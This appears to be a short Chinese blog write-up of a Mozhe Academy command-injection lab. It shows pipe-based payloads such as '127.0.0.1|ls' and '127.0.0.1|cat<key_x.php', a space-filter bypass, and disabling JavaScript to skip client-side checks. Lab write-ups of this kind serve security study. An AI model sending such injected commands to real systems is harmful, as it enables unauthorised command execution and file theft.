一.解题思路

利用管道符构造命令

二.操作步骤

解法一

1.测试127.0.0.1能否返回正常数据
墨者学院—命令注入执行分析—两种解法

2.使用BP抓包,改包
查看文件信息 iipp = 127.0.0.1|ls
墨者学院—命令注入执行分析—两种解法

查看key文件信息 iipp = 127.0.0.1|cat key_x.php
但是发现不能正常传输数据,空格被过滤。命令改为iipp = 127.0.0.1|cat<key_x.php

墨者学院—命令注入执行分析—两种解法

解法二

1.在火狐中禁用JS
在URL中输入about:config 开启火狐高级设置
墨者学院—命令注入执行分析—两种解法

2.命令127.0.0.1|ls
墨者学院—命令注入执行分析—两种解法

3.命令127.0.0.1|cat<key_x.php
墨者学院—命令注入执行分析—两种解法
网络信息安全-ploto

相关文章:

  • 2022-01-25
  • 2022-01-06
  • 2021-05-09
  • 2022-01-12
  • 2021-11-09
  • 2021-04-24
  • 2021-11-27
  • 2021-10-20
猜你喜欢
  • 2021-10-30
  • 2021-07-21
  • 2021-10-31
  • 2021-11-29
  • 2021-10-15
  • 2021-10-21
  • 2021-10-11
相关资源
相似解决方案